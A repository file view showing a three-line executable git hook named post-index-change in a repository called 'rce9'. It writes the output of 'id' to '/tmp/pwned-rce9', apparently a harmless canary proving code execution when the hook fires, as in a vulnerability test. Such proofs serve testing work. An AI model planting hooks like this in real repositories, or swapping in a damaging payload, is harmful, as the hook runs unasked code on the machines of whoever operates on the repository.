Files
rce9/hooks/post-index-change
2026-08-09 12:40:44 +02:00

4 lines
38 B
Bash
Executable File

#!/bin/sh
id > /tmp/pwned-rce9
exit 0